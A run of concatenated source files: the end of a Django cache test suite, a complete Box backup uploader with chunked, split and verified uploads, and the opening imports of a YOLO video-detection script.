self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers with TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway, but the ETag header is 'special' because it relies on the
content being complete (which is not always the case with a
TemplateResponse).
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
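# For context (a sketch, not part of the test suite): make_template_fragment_key()
# builds the same keys used by the {% cache %} template tag, so a fragment cached
# with something like {% cache 500 spam varying_value %} can be invalidated with:
#
#   from django.core.cache import cache
#   from django.core.cache.utils import make_template_fragment_key
#   cache.delete(make_template_fragment_key('spam', ['abc:def%']))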
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
box_backup.py
|
#!/usr/bin/python3
# The MIT License (MIT)
#
# Copyright (c) 2017 Kyle Barlow
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
box_backup.py
Pip requirements: boxsdk>=2.0.0a9 oauth2client keyring
System package requirement: the python-dbus system package is needed to use keyring on Linux, so create a virtualenv with --system-site-packages. You probably already have it installed.
'''
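# A minimal environment sketch based on the requirements above (the virtualenv
# name is illustrative, not prescriptive):
#
#   python3 -m venv --system-site-packages box-venv
#   box-venv/bin/pip install 'boxsdk>=2.0.0a9' oauth2client keyring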
import os
import sys
import json
import webbrowser
import argparse
import getpass
import hashlib
import datetime
import base64
import math
import threading
import queue
import time
import random
from io import DEFAULT_BUFFER_SIZE
import boxsdk
from boxsdk import Client, LoggingClient
UPLOAD_URL = boxsdk.config.API.UPLOAD_URL
BOX_MAX_FILE_SIZE = 10737418240 # 10 GiB. The max is actually 15 GB, but 10 seems like a nice round number
BOX_MIN_CHUNK_UPLOAD_SIZE = 60000000 # 60 MB. Current min is actually 50 MB.
MAX_CHUNK_ATTEMPTS = 5 # Maximum number of times to try uploading a particular chunk
CLIENT_SECRETS_PATH = '/kortemmelab/shared/box-client_secrets.json'
import oauth2client
from oauth2client.contrib.keyring_storage import Storage
from oauth2client import tools
from oauth2client import transport # used by OAuthConnector.revoke()
from .Reporter import Reporter
class FolderTraversalException(Exception):
pass
class OAuthConnector(boxsdk.OAuth2):
'''
Overrides the Box OAuth class with calls to the matching oauth2client Credentials functions
'''
def __init__(
self,
credentials
):
self._credentials = credentials
self._current_chunked_upload_abort_url = None
@property
def access_token(self):
"""
Get the current access token.
:return:
current access token
:rtype:
`unicode`
"""
return self._credentials.get_access_token().access_token
def get_authorization_url(self, redirect_url):
raise Exception('Not implemented')
def authenticate(self, auth_code):
"""
:return:
(access_token, refresh_token)
:rtype:
(`unicode`, `unicode`)
"""
return self.access_token, None
def refresh(self, access_token_to_refresh):
return self.access_token, None
def send_token_request(self, data, access_token, expect_refresh_token=True):
"""
:return:
The access token and refresh token.
:rtype:
(`unicode`, `unicode`)
"""
return self.access_token, None
def revoke(self):
"""
Revoke the authorization for the current access/refresh token pair.
"""
http = transport.get_http_object()
self._credentials.revoke(http)
class BoxAPI:
def __init__(self):
storage = Storage('klab_box_sync', getpass.getuser())
self.credentials = storage.get()
if self.credentials is None:
parser = argparse.ArgumentParser(parents=[tools.argparser])
flags = parser.parse_args()
flow = oauth2client.client.flow_from_clientsecrets(CLIENT_SECRETS_PATH, scope='', redirect_uri = 'http://localhost:8080')
self.credentials = tools.run_flow(flow, storage, flags)
self.oauth_connector = OAuthConnector(self.credentials)
self.client = Client( self.oauth_connector ) # Replace this with LoggingClient for debugging
self.root_folder = self.client.folder( folder_id = '0' )
self._upload_test_only = False # Don't perform actual uploads if True. Was used to debug memory leaks.
def _find_folder_by_name_inner( self, folder_id, name, limit = 500 ):
search_folder = self.client.folder( folder_id = folder_id )
offset = 0
search_folders = search_folder.get_items( limit = limit, offset = offset )
while len(search_folders) > 0:
folders = [ f for f in search_folders if f['name'] == name and f['type'] == 'folder' ]
if len( folders ) == 1:
return folders[0]['id']
offset += limit
search_folders = search_folder.get_items( limit = limit, offset = offset )
return None
def create_folder( self, root_folder_id, folder_name ):
# Creates a folder in Box folder folder_id if it doesn't exist already
folder_id = self._find_folder_by_name_inner( root_folder_id, folder_name )
if folder_id is None:
return self.client.folder( folder_id = root_folder_id ).create_subfolder(folder_name ).id
else:
return folder_id
def find_file( self, folder_id, basename, limit = 500 ):
'''
Finds a file based on a box path
Returns a list of file IDs
Returns multiple file IDs if the file was split into parts with the extension '.partN' (where N is an integer)
'''
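# For example (hypothetical names), a large upload stored as 'archive.tar.part0',
# 'archive.tar.part1', ... is returned, in order, when searching for the
# basename 'archive.tar'.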
search_folder = self.client.folder( folder_id = folder_id )
offset = 0
search_items = search_folder.get_items( limit = limit, offset = offset )
found_files = []
while len(search_items) > 0:
files = [ (f['id'], f['name']) for f in search_items if f['name'].startswith( basename ) and f['type'] == 'file' ]
files.sort()
for f_id, f_name in files:
assert(
f_name == basename
or
( f_name.startswith( basename ) and f_name[len(basename):len(basename)+5] == '.part' )
)
found_files.extend( files )
offset += limit
search_items = search_folder.get_items( limit = limit, offset = offset )
return [f[0] for f in found_files]
def find_folder_path( self, folder_path ):
current_folder_id = '0'
for folder_name in os.path.normpath(folder_path).split(os.path.sep):
if len(folder_name) > 0:
current_folder_id = self._find_folder_by_name_inner( current_folder_id, folder_name )
return current_folder_id
def upload( self,
destination_folder_id,
source_path,
preflight_check = True,
verify = False, # After upload, check sha1 sums
lock_file = True, # By default, lock uploaded files to prevent changes (unless manually unlocked)
maximum_attempts = 5, # Number of times to retry upload after any exception is encountered
verbose = True,
chunked_upload_threads = 5,
):
for trial_counter in range( maximum_attempts ):
try:
file_size = os.stat(source_path).st_size
uploaded_file_ids = []
if file_size >= BOX_MAX_FILE_SIZE:
uploaded_file_ids = self._upload_in_splits( destination_folder_id, source_path, preflight_check, verbose = verbose, chunked_upload_threads = chunked_upload_threads )
else:
# The file will not be uploaded in splits (the split code path checks whether each split already exists),
# so check here whether the file itself already exists.
# We don't check whether the contents actually match here; that happens below at the verify step.
uploaded_box_file_ids = self.find_file( destination_folder_id, os.path.basename( source_path ) )
if len(uploaded_box_file_ids) != 1:
if file_size >= BOX_MIN_CHUNK_UPLOAD_SIZE: # 60 MB (BOX_MIN_CHUNK_UPLOAD_SIZE)
uploaded_file_ids = [ self._chunked_upload( destination_folder_id, source_path, preflight_check = preflight_check, verbose = verbose, upload_threads = chunked_upload_threads, ) ]
else:
if not self._upload_test_only:
uploaded_file_ids = [ self.client.folder( folder_id = destination_folder_id ).upload( file_path = source_path, preflight_check = preflight_check, preflight_expected_size = file_size ).get().response_object['id'] ]
if lock_file:
self.lock_files( uploaded_file_ids )
if verify:
if not self.verify_uploaded_file( destination_folder_id, source_path ):
return False
return True
except:
if maximum_attempts > 1 and verbose:
print(( 'Uploading file {0} failed attempt {1} of {2}'.format(source_path, trial_counter+1, maximum_attempts) ))
elif maximum_attempts == 1:
raise
return False
def lock_files( self, file_ids, prevent_download = False ):
for file_id in file_ids:
self.lock_file( file_id, prevent_download = prevent_download )
def lock_file( self, file_id, prevent_download = False ):
self.client.file( file_id = file_id ).lock()
def verify_uploaded_file(
self,
destination_folder_id,
source_path,
verbose = True,
):
'''
Verifies the integrity of a file uploaded to Box
'''
source_file_size = os.stat(source_path).st_size
total_part_size = 0
file_position = 0
uploaded_box_file_ids = self.find_file( destination_folder_id, os.path.basename( source_path ) )
total_sha1 = hashlib.sha1()
for i, file_id in enumerate(uploaded_box_file_ids):
file_info = self.client.file( file_id = file_id ).get()
uploaded_sha1 = file_info.response_object['sha1']
uploaded_size = file_info.response_object['size']
part_sha1 = read_sha1( source_path, start_byte = file_position, read_size = uploaded_size, extra_hashers = [total_sha1] )
if part_sha1.hexdigest() != uploaded_sha1:
print( '\n' )
print(( 'Part sha1: ' + part_sha1.hexdigest() ))
print(( 'Uploaded sha1: ' + uploaded_sha1 ))
print(('Sha1 hash of uploaded file {0} ({1}) does not match'.format(file_info.response_object['name'], file_id) ))
return False
file_position += uploaded_size
total_part_size += uploaded_size
if len(uploaded_box_file_ids) > 1:
print(( 'Finished verifying part {0} of {1} of {2}'.format( i+1, len(uploaded_box_file_ids), file_id ) ))
assert( source_file_size == total_part_size )
if verbose:
print(( 'Verified uploaded file {0} ({1}) with sha1: {2}'.format(source_path, file_id, total_sha1.hexdigest()) ))
return True
def _upload_in_splits( self, destination_folder_id, source_path, preflight_check, verbose = True, chunked_upload_threads = 5 ):
'''
Since Box has a maximum file size limit (15 GB at time of writing),
we need to split files larger than this into smaller parts, and chunk upload each part
'''
file_size = os.stat(source_path).st_size
split_size = BOX_MAX_FILE_SIZE
# Make sure that the last split piece is still big enough for a chunked upload
while file_size % split_size < BOX_MIN_CHUNK_UPLOAD_SIZE:
split_size -= 1000
if split_size < BOX_MIN_CHUNK_UPLOAD_SIZE:
raise Exception('Could not find a split size that leaves the last part large enough for a chunked upload')
split_start_byte = 0
part_count = 0
uploaded_file_ids = []
while split_start_byte < file_size:
dest_file_name = '{0}.part{1}'.format( os.path.basename(source_path), part_count)
prev_uploaded_file_ids = self.find_file( destination_folder_id, dest_file_name )
if len( prev_uploaded_file_ids ) == 1:
if verbose:
print(( '\nSkipping upload of split {0} of {1}; already exists'.format( part_count + 1, math.ceil(file_size / split_size) ) ))
uploaded_file_ids.extend( prev_uploaded_file_ids )
else:
if verbose:
print(( '\nUploading split {0} of {1}'.format( part_count + 1, math.ceil(file_size / split_size) ) ))
uploaded_file_ids.append( self._chunked_upload(
destination_folder_id, source_path,
dest_file_name = dest_file_name,
split_start_byte = split_start_byte,
file_size = min(split_size, file_size - split_start_byte), # Take the min of file_size - split_start_byte so that the last part of a split doesn't read into the next split
preflight_check = preflight_check,
verbose = verbose,
upload_threads = chunked_upload_threads,
) )
part_count += 1
split_start_byte += split_size
return uploaded_file_ids
def _abort_chunked_upload(self):
delete_response = self.client.session.delete( self._current_chunked_upload_abort_url, expect_json_response = False )
assert( delete_response.status_code == 204 )
assert( len(delete_response.content) == 0 )
self._current_chunked_upload_abort_url = None
def _chunked_upload(
self,
destination_folder_id,
source_path,
dest_file_name = None,
split_start_byte = 0,
file_size = None,
preflight_check = True,
upload_threads = 5, # Your results may vary
verbose = True,
):
dest_file_name = dest_file_name or os.path.basename( source_path )
file_size = file_size or os.stat(source_path).st_size
destination_folder = self.client.folder( folder_id = destination_folder_id )
if preflight_check and not self._upload_test_only:
destination_folder.preflight_check( size = file_size, name = dest_file_name )
url = '{0}/files/upload_sessions'.format(UPLOAD_URL)
data = json.dumps({
'folder_id' : destination_folder_id,
'file_size' : file_size,
'file_name' : dest_file_name,
})
if self._upload_test_only:
json_response = {
'id' : 0,
'part_size' : 5000000, # 5 MB
'session_endpoints' : { 'abort' : None },
'total_parts' : math.ceil( float(file_size) / float(5000000) ),
}
else:
json_response = self.client.session.post(url, data=data, expect_json_response=True).json()
self._current_chunked_upload_abort_url = json_response['session_endpoints']['abort']
upload_responses = {
'create' : json_response,
'parts' : {},
}
session_id = json_response['id']
part_size = json_response['part_size']
reporter = Reporter( 'uploading ' + source_path + ' as ' + dest_file_name, entries = 'chunks', print_output = verbose )
reporter.set_total_count( json_response['total_parts'] )
uploads_complete = threading.Event()
totally_failed = threading.Event()
chunk_queue = queue.PriorityQueue()
results_queue = queue.PriorityQueue()
def upload_worker():
while (not uploads_complete.is_set()) and (not totally_failed.is_set()):
try:
part_n, args = chunk_queue.get(True, 0.3)
except queue.Empty:
continue
source_path, start_byte, header_start_byte, read_amount, attempt_number = args
attempt_number += 1
try:
sha1 = hashlib.sha1()
with open( source_path, 'rb' ) as f:
f.seek( start_byte )
data = f.read( read_amount )
sha1.update(data)
headers['digest'] = 'sha=' + base64.b64encode(sha1.digest()).decode()
headers['content-range'] = 'bytes {0}-{1}/{2}'.format( header_start_byte, header_start_byte + len(data) - 1, file_size )
if self._upload_test_only:
results_queue.put( (part_n, {'part' : part_n}) )
else:
part_response = self.client.session.put(url, headers = headers, data = data, expect_json_response = True)
results_queue.put( (part_n, dict(part_response.json())) )
reporter.increment_report()
except:
if attempt_number >= MAX_CHUNK_ATTEMPTS:
if verbose:
print(( '\nSetting total failure after attempt {0} for part_n {1}\n'.format( attempt_number, part_n ) ))
totally_failed.set()
else:
chunk_queue.put( (part_n, (source_path, start_byte, header_start_byte, read_amount, attempt_number) ) )
chunk_queue.task_done()
upload_worker_threads = []
for i in range( upload_threads ):
t = threading.Thread( target = upload_worker )
t.start()
upload_worker_threads.append(t)
for part_n in range( json_response['total_parts'] ):
header_start_byte = part_n * part_size
start_byte = split_start_byte + header_start_byte
url = '{0}/files/upload_sessions/{1}'.format( UPLOAD_URL, session_id )
headers = {
'content-type' : 'application/octet-stream',
}
read_amount = min(part_size, file_size - header_start_byte) # Make sure the last part of a split doesn't read into the next split
if not read_amount > 0:
if verbose:
print((read_amount, part_size, file_size, start_byte))
raise Exception('read_amount failure')
upload_args = (source_path, start_byte, header_start_byte, read_amount, 0) # Last 0 is attempt number
chunk_queue.put( (part_n, upload_args) )
total_sha = hashlib.sha1()
def read_total_hash_worker():
# We are reading the file for a second time just for hashing here, but that seems
# better than trying to save the whole file in memory for hashing at the end.
# The upload should be the slower operation anyway and keeps running in the background while we hash.
for part_n in range( json_response['total_parts'] ):
if totally_failed.is_set():
break
header_start_byte = part_n * part_size
start_byte = split_start_byte + part_n * part_size
read_amount = min(part_size, file_size - header_start_byte) # Make sure the last part of a split doesn't read into the next split
with open( source_path, 'rb' ) as f:
f.seek( start_byte )
data = f.read( read_amount )
total_sha.update(data)
total_hasher = threading.Thread( target = read_total_hash_worker )
total_hasher.start()
# Wait for everything to finish or fail
chunk_queue.join()
uploads_complete.set()
if totally_failed.is_set():
# Cancel chunked upload upon exception
self._abort_chunked_upload()
if verbose:
print(( 'Chunk upload of file {0} (in {1} parts) cancelled'.format(source_path, json_response['total_parts']) ))
raise Exception('Totally failed upload')
reporter.done()
if total_hasher.is_alive():
if verbose:
print( 'Waiting to compute total hash of file' )
total_hasher.join()
while not results_queue.empty():
part_n, part_response = results_queue.get()
upload_responses['parts'][part_n] = part_response['part']
# Commit
try:
if verbose:
print( 'Committing file upload' )
url = '{0}/files/upload_sessions/{1}/commit'.format( UPLOAD_URL, session_id )
data = json.dumps({
'parts' : [ upload_responses['parts'][part_n] for part_n in range( json_response['total_parts'] ) ],
})
headers = {}
headers['digest'] = 'sha=' + base64.b64encode(total_sha.digest()).decode()
if self._upload_test_only:
commit_response = {}
else:
commit_response = self.client.session.post(url, headers=headers, data=data, expect_json_response=True).json()
upload_responses['commit'] = commit_response
except:
# Cancel chunked upload upon exception
self._abort_chunked_upload()
if verbose:
print(( 'Chunk upload of file {0} (in {1} parts) cancelled'.format(source_path, json_response['total_parts']) ))
raise
self._current_chunked_upload_abort_url = None
if self._upload_test_only:
return None
else:
file_ids = self.find_file( destination_folder_id, dest_file_name )
assert( len(file_ids) == 1 )
return file_ids[0]
def upload_path( self, upload_folder_id, fpath, verbose = True, lock_files = True, maximum_attempts = 5, retry_already_uploaded_files = False, write_marker_files = False, outer_upload_threads = 5, upload_in_random_order = True ):
# Will upload a file, or recursively upload a folder, leaving behind verification files in its wake
assert( os.path.exists( fpath ) )
big_batch_threshold = 10 # Verbosity is higher if the total number of files to upload is less than this
def find_files_recursive( search_path, outer_folder_id ):
# This function also creates missing Box folders as it searches the local filesystem
if os.path.isfile(search_path):
if search_path.endswith('.uploadedtobox'):
return []
return [ (search_path, outer_folder_id) ]
else:
inner_folder_id = self.create_folder( outer_folder_id, os.path.basename(search_path) )
found_files = []
for x in os.listdir( search_path ):
found_files.extend( find_files_recursive( os.path.join( search_path, x ), inner_folder_id ) )
return found_files
if verbose:
print(( 'Recursively searching for files to upload in:', fpath ))
files_to_upload = find_files_recursive( fpath, upload_folder_id )
if verbose:
print(( 'Found {} files to upload'.format(len(files_to_upload)) ))
if len(files_to_upload) >= big_batch_threshold:
r = Reporter( 'uploading big batch of files to Box', entries = 'files', eol_char = '\r' )
else:
r = Reporter( 'uploading batch of files to Box', entries = 'files', eol_char = '\n' )
r.set_total_count( len(files_to_upload) )
files_to_upload.sort()
files_to_upload_queue = queue.PriorityQueue()
results_queue = queue.Queue()
uploads_complete = threading.Event()
def upload_worker():
while not uploads_complete.is_set():
try:
i, source_path_upload, folder_to_upload_id, call_upload_verbose, uploaded_marker_file = files_to_upload_queue.get(True, 0.3)
except queue.Empty:
continue
upload_successful = False
file_totally_failed = False
for trial_counter in range( maximum_attempts ):
if file_totally_failed:
break
try:
upload_successful = self.upload( folder_to_upload_id, source_path_upload, verify = False, lock_file = lock_files, maximum_attempts = 1, verbose = call_upload_verbose, chunked_upload_threads = 3 )
except Exception as e:
print(e)
upload_successful = False
if not upload_successful:
if maximum_attempts > 1:
print(( 'Uploading file {0} failed upload in attempt {1} of {2}'.format(source_path_upload, trial_counter+1, maximum_attempts) ))
continue
try:
if not self.verify_uploaded_file( folder_to_upload_id, source_path_upload, verbose = call_upload_verbose ):
upload_successful = False
except Exception as e:
print(e)
upload_successful = False
if not upload_successful:
if maximum_attempts > 1:
print(( 'Uploading file {0} failed verification in attempt {1} of {2}. Removing and potentially retrying upload.'.format(source_path_upload, trial_counter+1, maximum_attempts) ))
try:
file_ids = self.find_file( folder_to_upload_id, os.path.basename( source_path_upload ) )
except Exception as e:
print(e)
file_ids = []
for file_id in file_ids:
try:
self.client.file( file_id = file_id ).delete()
except:
print(( 'Delete failed, skipping file ' + source_path_upload ))
file_totally_failed = True
upload_successful = False
continue
break
results_queue.put( (source_path_upload, folder_to_upload_id, upload_successful, uploaded_marker_file) )
files_to_upload_queue.task_done()
if len(files_to_upload) >= big_batch_threshold:
inner_verbosity = False
else:
inner_verbosity = True
i = 0
for file_path, inner_folder_id in files_to_upload:
uploaded_marker_file = file_path + '.uploadedtobox'
if os.path.isfile( uploaded_marker_file ):
if retry_already_uploaded_files:
os.remove( uploaded_marker_file )
else:
print(( 'Skipping already uploaded file: ' + file_path ))
r.decrement_total_count()
continue
# Since we are putting into a sorted PriorityQueue, we add a random first tuple member if randomness is desired
if upload_in_random_order:
worker_args = (random.random(), file_path, inner_folder_id, inner_verbosity, uploaded_marker_file)
else:
worker_args = (i, file_path, inner_folder_id, inner_verbosity, uploaded_marker_file)
files_to_upload_queue.put( worker_args )
i += 1
upload_worker_threads = []
for i in range( outer_upload_threads ):
t = threading.Thread( target = upload_worker )
t.start()
upload_worker_threads.append(t)
failed_files = queue.PriorityQueue()
def results_worker():
while not uploads_complete.is_set():
try:
source_path_upload, folder_to_upload_id, upload_successful, uploaded_marker_file = results_queue.get(True, 0.95)
except queue.Empty:
continue
if upload_successful:
if write_marker_files:
try:
with open(uploaded_marker_file, 'w') as f:
f.write( str( datetime.datetime.now() ) )
except:
# Sometimes this might fail if we have a permissions error (e.g. uploading a file in a directory where we only have read permission), so we just ignore
pass
else:
print(( 'Totally failed:', source_path_upload ))
failed_files.put( source_path_upload )
if os.path.isfile(uploaded_marker_file):
os.remove(uploaded_marker_file)
r.increment_report()
results_worker_thread = threading.Thread( target = results_worker )
results_worker_thread.start()
files_to_upload_queue.join()
uploads_complete.set()
for t in upload_worker_threads:
t.join()
results_worker_thread.join()
failed_files_list = []
while not failed_files.empty():
failed_files_list.append( failed_files.get() )
return failed_files_list
def read_sha1(
file_path,
buf_size = None,
start_byte = 0,
read_size = None,
extra_hashers = [], # update(data) will be called on all of these
):
'''
Determines the sha1 hash of a file in chunks, to prevent loading the entire file at once into memory
'''
read_size = read_size or os.stat(file_path).st_size
buf_size = buf_size or DEFAULT_BUFFER_SIZE
data_read = 0
total_sha1 = hashlib.sha1()
while data_read < read_size:
with open( file_path, 'rb', buffering = 0 ) as f:
f.seek( start_byte )
data = f.read( min(buf_size, read_size - data_read) )
assert( len(data) > 0 )
total_sha1.update( data )
for hasher in extra_hashers:
hasher.update( data )
data_read += len(data)
start_byte += len(data)
assert( data_read == read_size )
return total_sha1
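# A minimal usage sketch for read_sha1() (the path below is hypothetical and this
# helper is never called by the script itself):
def _example_read_sha1_usage(path='/tmp/example.bin'):
    # Stream the whole file through the hasher in buffered chunks and print the digest.
    print(read_sha1(path).hexdigest())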
if __name__ == '__main__':
import argparse
box = BoxAPI()
parser = argparse.ArgumentParser(description='Upload files to Box')
parser.add_argument('--nolock', dest='lock', action='store_false', help='Do not lock files after upload')
parser.set_defaults( lock = True )
parser.set_defaults( markers = False )
parser.add_argument('--writemarkers', dest='markers', action='store_true', help='Write marker files to indicate an upload succeeded')
parser.add_argument('destination_folder', help='File path (in Box system) of destination folder')
parser.add_argument('file_or_folder_to_upload', nargs='+', help='Path (on local file system) of file(s) or folder(s) to upload to Box. If argument is a folder, all files in that folder (non-recursive) will be uploaded to the destination folder.')
args = parser.parse_args()
upload_folder_id = box.find_folder_path( args.destination_folder )
print(( 'Upload destination folder id: {0} {1}'.format( upload_folder_id, args.destination_folder ) ))
failed_uploads = []
for path_to_upload in sorted( args.file_or_folder_to_upload ):
failed_uploads.extend( box.upload_path( upload_folder_id, path_to_upload, lock_files = args.lock, write_marker_files = args.markers ) )
if len(failed_uploads) > 0:
print( '\nAll failed uploads:' )
print( failed_uploads )
with open( 'failed_uploads.txt', 'w' ) as f:
f.write( str(failed_uploads) )
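# Example invocation (the Box and local paths are illustrative):
#
#   python box_backup.py --writemarkers /Backups/2017 /data/archive.tar /data/results
#
# This uploads the given file and folder into the Box folder '/Backups/2017',
# writing '.uploadedtobox' marker files next to successfully uploaded files.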
|
darknet1.py
|
#!python3
'''
##############################
### Receive video stream ####
### from Android client #####
### Run YOLO detection ######
### (return a message to the mobile device) ###
##############################
'''
from ctypes import *
import math
import random
import os
import socket
import time
import cv2
import numpy as np
from PIL import Image
